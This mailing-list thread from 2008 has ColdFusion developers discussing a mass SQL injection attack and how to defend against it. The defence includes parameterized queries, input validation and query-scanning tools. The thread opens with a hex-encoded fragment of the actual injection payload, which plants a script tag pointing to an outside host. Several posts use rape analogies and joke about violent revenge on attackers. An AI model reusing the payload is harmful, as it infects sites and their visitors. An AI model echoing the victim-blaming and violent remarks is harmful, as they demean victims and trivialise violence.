6C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C21
2D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F534520546162
6C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S);
On Fri, Aug 15, 2008 at 3:30 PM, Justin Scott
<jscott@gravityfree.com>wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311055
> But I know all this, I thought the sql injection attack went beyond it,
thanks anyway, Justin.
Not as far as technique, but it was much larger in scale than most of us
have experience before. Some were getting hit so hard they had to
filter it farther up the chain (IIS, firewall, etc.) but for the
majority of us the standard secure coding methods kept it out.
-Justin Scott
Author: Charlie Griefer
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311054
On Fri, Aug 15, 2008 at 1:12 PM, D
> But I know all this, I thought the sql injection attack went beyond it,
> thanks anyway, Justin.
>
it did not.
--
A byte walks into a bar and orders a pint. Bartender asks him "What's
wrong?" Byte says "Parity error." Bartender nods and says "Yeah, I thought
you looked a bit off."
Author: Don L
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311051
But I know all this, I thought the sql injection attack went beyond it, thanks
anyway, Justin.
----- Excess quoted text cut - see Original Post for more -----
cfm/20> 08/7/24/Announcing-the-first-ever-International-Operation-cfSQLprotect
----- Excess quoted text cut - see Original Post for more -----
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311050
> Sorry for the "top posting", where are we now in terms of best practice for
cf8 protection again sql injection attack? Going through 136+ posts seems a bit
too much, many thanks. Some one who has closely monitored this thread probably
could help.
The same place we've always been:
* Validate user input
* Use CFQUERYPARAM
For applications that have old code, run a tool that will tell you what
queries need to be updated or run a front-end filter that will do a
basic check on input while you're updating that old code to use proper
security methods.
CFQUERYPARAM:
http://www.adobe.com/devnet/coldfusion/articles/cfqueryparam.html
Query scanning tools:
http://www.codersrevolution.com/index.cfm/2008/7/24/Announcing-the-first-ever-International-Operation-cfSQLprotect
Basic URL value filter:
http://www.gravityfree.com/_sqlprev.cfm.txt
-Justin Scott
Author: Don L
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311049
Sorry for the "top posting", where are we now in terms of best practice for cf8
protection again sql injection attack? Going through 136+ posts seems a bit too
much, many thanks. Some one who has closely monitored this thread probably could
help.
----- Excess quoted text cut - see Original Post for more -----
Author: David Lakein
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310901
----- Excess quoted text cut - see Original Post for more -----
I also had a concern about thread safety; it's caching the
java.util.regex.Matcher object in Application scope, and calling
Application.injChecker.reset(testvar) for each url/form/etc variable -- seems
like Matcher.reset() changes state of the cached Matcher object?
It might be safer to cache the Pattern, then get the rePattern.matcher('') on
each request.
Looks cool otherwise, though I might remove some of the keywords from the regex
before using here.
Thanks,
- David
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310885
> You of all people have been around long enough to know, that
> if we as a developer could have our jobs made easier. Makes
> me wonder why you made your comment?
I don't see it as Adobe's place to tell me how to write code, which is
essentially what a framework of any type does. In the same way that Sun
doesn't distribute frameworks for Java, I don't see this as a job for Adobe.
I would be ok with them making CF more "friendly" to Hibernate-like
frameworks - compiling CFCs as discrete Java classes rather than a bunch of
classes, one for each function, for example.
> Grails is built on top of Java, just as much as ColdFusion
> is. So what is your point?
While CF is a Java application, from the CF developer's perspective it's a
programming language. Frameworks aren't incorporated in programming
languages for a very good reason - people have different opinions about
which frameworks to use.
> But one can dream..... Like you said, I also doubt it will
> become open source this release... Or even the next, but it
> will happen... Mark those words...
Not while it's offered for sale by Adobe.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310849
...
> But one can dream..... Like you said, I also doubt it will become open
> source this release... Or even the next, but it will happen... Mark those
> words...
While I don't think we'll get away from SQL anytime soon, I have
managed to get most of hibernate's functionality to work with CF.
I've gone so far as to use it to reverse engineer the database and
create POJO CFCs (oh, that would be a bad buzzword to start!), in line
with the source generation hibernate can do.
And, this seemed pretty cool: you can "annotate" cfcs, which are used
to build your DB schema, and it will try to update the schema as you
update the model (the cfcs).
You can run queries based on objects and whatnot, sorta, but I'm still
playing with a lot of the implementation, and want to run some load
tests as part of that, etc..
With what I've got so far, you can also drive your model and your DB
with the hibernate HBM mapping files, since I, once again, sorta
followed what hibernate already had, and mostly, I wanted to take
advantage of the nifty eclipse hibernate plugin (nice: auto-completes,
GUI relationship editor, query builder/runner, etc.).
My code is all still like, pre-alpha, but it appears to be sorta a
workable idea.
Hibernate is very robust! Color me impressed.
Railo and BlueDragon are both entering the open source arena, there's
nothing preventing us from doing whatever we want, really. That's a
wonderful feeling!
With MG3 (maybe with some more fleshing out of it's scaffolding), and
hibernate, we're about where you want to be, already.
I'm way on board for the idea of having some tight integration with
hibernate in the next release tho-- if it ties in with half the stuff
hibernate can do, I'd be stoked.
I'm not sure about the ethical ramifications of cfc annotation, though.
Should ColdFusion components really drive your model? HBM mappings, even?
Eh, it's cool as fuck anyways. =]
--
"The earth laughs in flowers."
E. E. Cummings
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310823
Dave,
You of all people have been around long enough to know, that if we as a
developer could have our jobs made easier. Makes me wonder why you made your
comment?
Grails is built on top of Java, just as much as ColdFusion is. So what is
your point?
As far as an ORM, I would love to see spring and hibernate native to
ColdFusion with support for the dynamicness of grails.
Could you imagine your new Domain modal creating, updating etc., based on
your Domain Modal and having that automatically done on your DB... And there
is no more coding for different DB's, why because the ORM takes all that
under control for you.
But closures and dynamicness of grails, makes me think how great it is to
write code like this
Def saveAs = {
Account.dowherefullNameIsLike("something")
}
That is not the exact syntax, but the fact that the where condition is
dynamically built.
I actually love the concept that ColdFusion could adopt a more dynamic
approach, with the integration of Spring and Hybernate and maybe the ability
to run groovy the reality is strong even if Adobe don't wish to do it. The
ability to provide on the fly scaffolding is also great. True MVC approach
if you wanted with SES integration...
The point is that ColdFusion can be extremely as powerfull, with the ability
to add these things.
Now the point is openSource also allows us developers to make these
integrations, and also to the maybe share these as a plugin. This seperates
the core engine from the features of the product, and this is why I think it
is a wise move. Because it allows the fixes, to be made by anyone and
submitted back to adobe. As for 3rd party integration like cfreport,
cfdocument to name a couple. These would then fall into features, that Adobe
can still hang on too. And hence becomes their new business model for CF
going forward into the brave world of opensource.
But one can dream..... Like you said, I also doubt it will become open
source this release... Or even the next, but it will happen... Mark those
words...
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
> The second is that this is why..... ColdFusion should have
> adopted an approach that used an ORM instead.... With an ORM
> it reduces the risk, provided the ORM takes these attacks seriously.
>
> I have never seen these attacks with hibernate, within GORM
> and Domain Driven design approaches.
ColdFusion is a programming language, like Java. Just as Java doesn't come
with an ORM, neither should CF.
> I so hope that ColdFusion 9, has 2 things on its release.
>
> 1) The engine itself is open sourced. And the extra
> functionality and support for middle tier API integration is adopted.
I strongly doubt that CF will be open source.
> 2) GORM style approach as in DDD (Domain Driven Design) is
> taken more seriously.
>
> With these 2 additions then SQL injection will be a thing of the past.
With prepared statements, SQL injection has long been a thing of the past.
It's not the job of an ORM to separate SQL code from data values.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310814
Interestingly, hibernate is one of the rumoured additions to CF9:
http://www.barneyb.com/barneyblog/2008/06/19/cfunited-day-one/
etc
>
> ColdFusion is a programming language, like Java. Just as Java doesn't come
> with an ORM, neither should CF.
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310800
...
> I just see different degrees of guilt. Negligence from developers,
> greedy shortcuts from management, lazyness from end users, criminal
> intent from hackers etc.
I don't see ISPs on there, and while I'm no fan of much of the
ISP-based stuff, there are certainly steps that could be taken to
improve the situation.
I think there is plenty of money being made on both ends, so it would
take a public outcry or something to affect change.
Not to defend crappy code (which I *never* create! My code's all
perfect, springing like some type of Greek (Roman?) god from my mind),
but really, it seems like heat on ISPs and whatnot isn't exactly a
/bad/ thing, in certain cases.
Or maybe it's all just freedom, and I should love it up while we gotz
it (probably serious, BTW).
Eh. That's all I got, just pointing out we're beholden, somehow, or
something. Hmm, not sure actually.
--
bah.
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310772
> Suggesting and getting caught doing are 2 different things. IF
> writing/posting code were an issue though... then everyone who posted the
> full script would be worried ;-)
I hope it's just chicken-little, but it's happening to other countries, so...
If we continue down the path we've sorta started, defending against
this stuff (by spreading information, and/or using tools) will be just
as illegal as actually perpetrating crimes.
Just a little off-topic food for thought. Fight for your right, pump
up the volume, etc..
/end public service announcement
--
email? Hmmm... get me my aid! -- Or better yet, just have the aid do
it for me.
Author: Wil Genovese
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310739
Security in layers.
While it is usually best to thwart this style of attack at the
route/firewall, it is wise to have the extra layers at the
Apache/IIS/webserver, Coldfusion Application, CF Query and JDBC DB user
permission layers. If the first layer is bypassed or compromised then the
next layer catches the attack and so on. Having security in layers makes it
that much harder for someone to launch a successful attack.
Wil Genovese
Sr. Web Application Developer
On Mon, Aug 11, 2008 at 11:22 AM, Dana Kowalski
<DanaKowalski@gmail.com>wrote:
> Seeing code solutions to this is cool. but imho its best left to your
> router/firewall to handle. I'd contact the provider to have them put some
> better controls in place. These are scenarios that almost delve into why
> cisco has the zero day features on their
gear..
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310737
> The second is that this is why..... ColdFusion should have
> adopted an approach that used an ORM instead.... With an ORM
> it reduces the risk, provided the ORM takes these attacks seriously.
>
> I have never seen these attacks with hibernate, within GORM
> and Domain Driven design approaches.
ColdFusion is a programming language, like Java. Just as Java doesn't come
with an ORM, neither should CF.
> I so hope that ColdFusion 9, has 2 things on its release.
>
> 1) The engine itself is open sourced. And the extra
> functionality and support for middle tier API integration is adopted.
I strongly doubt that CF will be open source.
> 2) GORM style approach as in DDD (Domain Driven Design) is
> taken more seriously.
>
> With these 2 additions then SQL injection will be a thing of the past.
With prepared statements, SQL injection has long been a thing of the past.
It's not the job of an ORM to separate SQL code from data values.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310735
----- Excess quoted text cut - see Original Post for more -----
This is a poor example, because there are issues of negligence that exist in
a professional setting (employee/employer or consultant/client) that don't
exist in a personal setting (hanging out on a street corner). Unwise actions
aren't necessary negligent in the eyes of the law.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310733
----- Excess quoted text cut - see Original Post for more -----
My school of thought is that, if you fail to conform to minimal standards of
adequate protection, you have failed to meet due diligence requirements.
Your client or employer can sue you for negligence, and they may well win.
Although, to be honest, that's not really a school of thought, it's an
observation of reality.
My school of thought is that there are some things within my control, and
other things beyond my control. I am responsible for the things within my
control. I don't have control over Eastern European crime syndicates. I do
have control over my own application code.
CFQUERYPARAM was introduced in CF4. You have had years to solve this
problem. Your applications may have been attacked long before now, without
you even knowing it.
You are free to be angry at the people who've done this. But you're going to
have to fix the problem yourself. If we lived in a world where justice were
guaranteed, I'd be right there with you in going after these folks, with the
requisite tar, feathers and pitchforks. If these people are ever brought to
court, I'll be right there with you in calling for their heads. But we don't
live in that world, and the only thing we can do is affect the things we
control.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Dana Kowalski
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310732
Seeing code solutions to this is cool. but imho its best left to your
router/firewall to handle. I'd contact the provider to have them put some better
controls in place. These are scenarios that almost delve into why cisco has the
zero day features on their gear..
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310729
Dave Morris wrote:
> Ah. You're from the "blame the victim" school.
I just see different degrees of guilt. Negligence from developers,
greedy shortcuts from management, lazyness from end users, criminal
intent from hackers etc.
> So I shouldn't be mad at the poor little hackers, because they were doing us
> all favor by pointing out our faults. That is your school of thought,
> right?
The fact is that we all know that whatever we connect to the internet
will be attacked. We all know it is an arms race that has been going on
for more then a decade and there is no end in sight. What is important
is what we do with that knowledge. Do we make sure we are protected to
the best of our ability, both for our own sake and to make sure our
systems do not become an attack vector against somebody else or not?
Every IP address of an attack source that has been published on this
list is from somebody who choose not to do so.
Jochem
Author: Rick Faircloth
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310726
I started not to use the rape analogy and certainly didn't want to
trivialize something so terrible, but thought it appropriate,
especially since someone had brought it up as an analogy previously.
Please don't take offense, anyone.
Know that I have a daughter and I tell her all the time not to put
herself by action or location in a situation to be vulnerable to such an attack.
And while I would gently remind her at some point if she were out
somewhere she shouldn't have been, I would probably just have to
kill her rapist...seriously.
----- Excess quoted text cut - see Original Post for more -----
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310724
> I'm fairly convinced this bot used the Internet Explorer on the victims
It would make sense to use the same ActiveX control IE uses, yes.
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: Greg Morphis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310721
Actually is was Dave Morris who originally used rape to compare the 2.
Rick was just responding..
----- Excess quoted text cut - see Original Post for more -----
Author: Robert Rawlins
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310720
Rick,
That might be a slightly off angle analogy. If a girl asks to be raped, then
she is clearly consenting to the act and therefore it's not technically rape
any more, that's the real world equivalent of building a server and
publishing open source software for download, then complaining that someone
'stole' it.
A better analogy is back to leaving the house door unlocked, it still
doesn't change the fact that a criminal act has been committed, the burglar
still takes your positions without consent, and the burglar would still be
found guilty for it, however, I suspect your house insurance wouldn't pay
out for the loss.
You're right though, this is a shared responsibility issue here, the hacker
is legally responsible for his acts, however, you have a responsibility to
your client or employer not to leave the door unlocked.
Rob
This would probably be more productively viewed as as
"responsibility" issue, rather than blame.
Both parties, webmaster and attacker, bear responsibility
for the status of the server/data/etc.
A negligent server/website admin bears a certain amount
of responsibility for the situation. The attacker also
bears responsibility for the consequences of the attack.
A court of law might hold only the attacker ultimately responsible.
However, the supervisor of a negligent server/website administrator
would view it as shared responsibility between the attacker
and the attacked, as in, "Why wasn't the server/website protected
in the first place?"
Viewing this as a rape case, if a girl was hanging out on a street corner
and asking passers-by to rape her, then, yes, she bears some responsibility
for putting herself in that situation. It doesn't mean the one who rapes
her doesn't bear the greater responsibility for the situation, and,
therefore,
punishment, but a fair judge would have to ask the girl why
was she asking passers-by to rape her in the first place.
Girls should reasonably avoid provoking rapists, and rapists should resist
their impulses.
Likewise, server/website admins should reasonably protect their servers and
websites,
but hackers should avoid their impulses or share responsibility for the
situation.
Rick
----- Excess quoted text cut - see Original Post for more -----
asking
> > for trouble.
> >
> > But crime is crime, and we should not be allowing criminals to CHOP
away
at
> > our systems until they find that one hole we didn't catch, and then
blame it
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310719
Rick,
While your argument is well put, perhaps we could choose a slightly less
inflammatory analogy than rape. We have a large group here and I wouldn't
want anyone to be incensed by trivializing such a traumatic event (although
obviously that is not the intent).
-Mark
This would probably be more productively viewed as as "responsibility"
issue, rather than blame.
Both parties, webmaster and attacker, bear responsibility for the status of
the server/data/etc.
A negligent server/website admin bears a certain amount of responsibility
for the situation. The attacker also bears responsibility for the
consequences of the attack.
A court of law might hold only the attacker ultimately responsible.
However, the supervisor of a negligent server/website administrator would
view it as shared responsibility between the attacker and the attacked, as
in, "Why wasn't the server/website protected in the first place?"
Viewing this as a rape case, if a girl was hanging out on a street corner
and asking passers-by to rape her, then, yes, she bears some responsibility
for putting herself in that situation. It doesn't mean the one who rapes
her doesn't bear the greater responsibility for the situation, and,
therefore, punishment, but a fair judge would have to ask the girl why was
she asking passers-by to rape her in the first place.
Girls should reasonably avoid provoking rapists, and rapists should resist
their impulses.
Likewise, server/website admins should reasonably protect their servers and
websites, but hackers should avoid their impulses or share responsibility
for the situation.
Rick
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310718
Actually, if you read by blog analysis of the zombies:
http://www.codersrevolution.com/index.cfm/2008/8/10/My-analysis-of-the-SQL-injection-zombies
7% of the IPs returned a cookie I set.
75% of IPs that sent more than 2 hits returned my cookie.
(Hits came in groups of two)
I'm fairly convinced this bot used the Internet Explorer on the victims
machine to send out the requests. I can't prove it, but it probably would
have been easier for them to code that way.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Larry Lyons
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310717
Criticizing someone for negligence is not blaming the victim. If the person who
coded the site is so incompetent as not to include a cfqueryparam for any user
input that has direct impact on the database, then they deserve to get blamed.
What's so difficult about <cfqueryparam cfsqltype="CF_SQL_INTEGER"
value="#form.foo#" />
As for going back and finding out where the unprotected queries are, its not that
difficult, if you're using CFEclipse, Dan Switzer of pengoworks has written a
nice bit of regex to use with the file search. It goes through your project or
entire workspace and finds all the queries that need paramed.
<cfquery\s[^>]*>([^#]*(((?<!value=")#[^#]*#)))((?<!</cfquery)[^>]*?)</cfquery>
There are also a few tools out there (mentioned previously on HOF) that will do
the same and produce detailed report. Try them as well. To make it easy, here are
links to two of the tools:
qpScanner by Peter Boughton (RiaForge)
http://www.codersrevolution.com/enclosures/qpscanner7.zip
Query Parameterizer by Daryl Banttari
http://www.codersrevolution.com/enclosures/_parameterizeQueries.zip
Brad Wood has written a good overview of both of these tools:
http://www.codersrevolution.com/index.cfm/2008/7/24/Announcing-the-first-ever-International-Operation-cfSQLprotect
You've got no excuse now.
----- Excess quoted text cut - see Original Post for more -----
Author: Rick Faircloth
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310716
This would probably be more productively viewed as as
"responsibility" issue, rather than blame.
Both parties, webmaster and attacker, bear responsibility
for the status of the server/data/etc.
A negligent server/website admin bears a certain amount
of responsibility for the situation. The attacker also
bears responsibility for the consequences of the attack.
A court of law might hold only the attacker ultimately responsible.
However, the supervisor of a negligent server/website administrator
would view it as shared responsibility between the attacker
and the attacked, as in, "Why wasn't the server/website protected
in the first place?"
Viewing this as a rape case, if a girl was hanging out on a street corner
and asking passers-by to rape her, then, yes, she bears some responsibility
for putting herself in that situation. It doesn't mean the one who rapes
her doesn't bear the greater responsibility for the situation, and, therefore,
punishment, but a fair judge would have to ask the girl why
was she asking passers-by to rape her in the first place.
Girls should reasonably avoid provoking rapists, and rapists should resist their
impulses.
Likewise, server/website admins should reasonably protect their servers and
websites,
but hackers should avoid their impulses or share responsibility for the
situation.
Rick
----- Excess quoted text cut - see Original Post for more -----
Author: Greg Morphis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310715
I see it as different than pointing fingers.. You ALLOWED it to happen
by not fully protecting your code, you're not necessarily to blame.
Anyways, good luck defending the attacks.
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Morris
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310714
And that girl who was raped should not have been wearing a skirt.
Yes, we've implemented things way more sophisticated than CFQUERYPARAM.
Anybody who waits until the SQL query to try to detect bogus data is asking
for trouble.
But crime is crime, and we should not be allowing criminals to CHOP away at
our systems until they find that one hole we didn't catch, and then blame it
on the victim!
Dave Morris
----- Excess quoted text cut - see Original Post for more -----
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310712
> I'm sure they exist even for CF 4.0
Yup, the val() function did/does wonders for integer input on queries,
even way back in CF4.
-Justin Scott
Author: Greg Morphis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310711
Ummm but is it not your website that YOU left vulnerable? If you
didn't have access to cfqueryparam then you should have used an
alternate approach. I'm sure they exist even for CF 4.0, a little
extra time at the beginning validating variables would save so much
grief now right? And from what I'm hearing from popular sites is it's
not so much the cfqueryparam because they are still getting hit
thousands of times every minute, like HoF. So there's other steps, not
just within CF. I think MD was working on a something to stop the
intruders at the server, before it even hits CF.
I'm not saying it's entirely YOUR fault but you allowed it to happen,
same thing Dave Watts is saying..
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Morris
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310705
Ah. You're from the "blame the victim" school.
Unfortunately, when I wrote the first 1,000 ColdFusion templates using Ben
Forta's CF 4.0 book, there was no CFQueryParam. So going back and rewriting
all those programs (now well into several thousand) has been a bitch. And
all it took was one missed spot.
So I shouldn't be mad at the poor little hackers, because they were doing us
all favor by pointing out our faults. That is your school of thought,
right?
Dave Morris
----- Excess quoted text cut - see Original Post for more -----
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310668
Hmmm...
Of course it is possible to use cookies.... They chose not too... Why...
Because they have no real need to be attached to a session....
Think about it for a minute or two...
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
very few bots accept cookies. I've never actually seen one that does,
but I have read it is possible to write one that will.
Wil Genovese
One man with courage makes a majority.
-Andrew Jackson
A fine is a tax for doing wrong. A tax is a fine for doing well.
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310667
Well.......
This has got to be the strongest case for unit testing then...
If a component is unit tested, then the first thing is that you will know
that this could happen and fix it straight away.
The second is that this is why..... ColdFusion should have adopted an
approach that used an ORM instead.... With an ORM it reduces the risk,
provided the ORM takes these attacks seriously.
I have never seen these attacks with hibernate, within GORM and Domain
Driven design approaches.
I so hope that ColdFusion 9, has 2 things on its release.
1) The engine itself is open sourced. And the extra functionality and
support for middle tier API integration is adopted.
2) GORM style approach as in DDD (Domain Driven Design) is taken more
seriously.
With these 2 additions then SQL injection will be a thing of the past.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Yep, was curious about that too. I modified Justin's script to not send
e-mails, but to write a simple log entry - more an act of curiosity than
anything else - I just log the date, time, and client IP address.
--- Ben
Tell us how you really feel Ben. :)
I had to temporarily stop apache on my site long enough to get a stop gap in
place. My database is safe, but I was getting around 90 requests a second
and ColdFusion and MySQL were eating up all the server's CPU trying to keep
up. SSH was even unresponsive.
I think I'm going to dump all these attempts in a database to analyze. I
curious where the majority of the IPs are coming from. There has to be a
way to squeak in the ear of ISPs loud enough to have them shut down infected
users until they are cleaned.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310658
> Anyway, I propose the dot-com millionaires who left us stuck
> with the current mess in the spam and virus arena be
> personally required to fund an international Goon Squad with
> kneecap breaking instructions to go after these vandals.
And who exactly would that be?
> If someone did this crap to your house, you'd have the police
> and/or FBI out there in a heartbeat tracking down the
> criminals. This is criminal mischief on a global scale.
If you left your front door open, so that anyone could just walk in, you'd
have no one but yourself to blame. If you're looking for an analogy, that's
the one that fits. The reason this particular attack has been so successful
is the arguably criminal negligence of so many web developers, coupled with
the typical improper usage of administrator rights on untrained users'
desktops.
People have been harping on these two issues for years - I know I have. As a
web developer, one of these issues is within your direct control. If you've
failed to do anything about unparameterized queries until something bad
happens to you, you've failed to meet the minimal due diligence for being a
web application developer.
> And if Interpol won't do anything about it, and if the powers
> that be refuse to attach any form of responsibility or
> traceability to the ownership of an IP address, then we may
> just have to implement vigilante measures and go after the
> crooks ourselves.
Well, uh, good luck with that. Let me know how it goes with you against the
Russian mafia. This stuff is no longer just maladjusted kids in their
parents' basement - there's money to be had here, and there are people going
after that money. I suggest your efforts are better directed at ensuring the
adequacy of your own sites' protection instead.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Michael Dinowitz
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310657
Wait, sorry. This is a cf-community thread, not a cf-talk one. It will be
moved right away.
On Sun, Aug 10, 2008 at 11:32 PM, Michael Dinowitz <
mdinowit@houseoffusion.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
--
Michael Dinowitz (http://www.linkedin.com/in/mdinowitz)
President: House of Fusion (http://www.houseoffusion.com)
Publisher: Fusion Authority (http://www.fusionauthority.com)
Adobe Community Expert / Advanced Certified ColdFusion Professional
Author: Michael Dinowitz
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310656
I propose a baseball bat. It works well with both genders.
> You assume much.
>
> Women are just as prowess at running a computer virus attack as men.
>
> We just don't hear about them as much, as they seem to not get caught as
> often.
>
Author: Dave Morris
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310655
You haven't been around teenage boys much recently. That and the XBox are the
ONLY things they would miss.
Anyway, I propose the dot-com millionaires who left us stuck with the current
mess in the spam and virus arena be personally required to fund an international
Goon Squad with kneecap breaking instructions to go after these vandals.
If someone did this crap to your house, you'd have the police and/or FBI out
there in a heartbeat tracking down the criminals. This is criminal mischief on a
global scale. And if Interpol won't do anything about it, and if the powers that
be refuse to attach any form of responsibility or traceability to the ownership
of an IP address, then we may just have to implement vigilante measures and go
after the crooks ourselves.
Dave Morris
(Owner of a huge web site who just spent 2 days fending off the barbarians at the
gates)
>::-----Original Message-----
>::Mind you given they most likely live in their parent's basement, they
>::probably would not miss it.
>::
>::
Author: William Seiter
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310653
You assume much.
Women are just as prowess at running a computer virus attack as men.
We just don't hear about them as much, as they seem to not get caught as
often.
:)
::-----Original Message-----
::
::Sent: Sunday, August 10, 2008 5:57 PM
::To: CF-Talk
::Subject: Re: SQL injection attack on House of Fusion
::
::>I've heard that in Saudi Arabia, a thief has the offending member removed
::at
::>the wrist. Since hackers commit their offence with their brain, wouldn't
::it
::>be appropriate to behead them?
::>
::>Just a suggestion. :-\
::>
::>Dave L.
::
::Personally I'd rather they had a different part of their anatomy cut off.
::
::Mind you given they most likely live in their parent's basement, they
::probably would not miss it.
::
::
Author: Larry Lyons
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310650
>I've heard that in Saudi Arabia, a thief has the offending member removed at
>the wrist. Since hackers commit their offence with their brain, wouldn't it
>be appropriate to behead them?
>
>Just a suggestion. :-\
>
>Dave L.
Personally I'd rather they had a different part of their anatomy cut off.
Mind you given they most likely live in their parent's basement, they probably
would not miss it.
Author: Bobby Hartsfield
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310641
Suggesting and getting caught doing are 2 different things. IF
writing/posting code were an issue though... then everyone who posted the
full script would be worried ;-)
If anything in my hypothetical 'if' were an issue though... I'd drag you
down with me for helping to spread it in your reply :-o
Heh
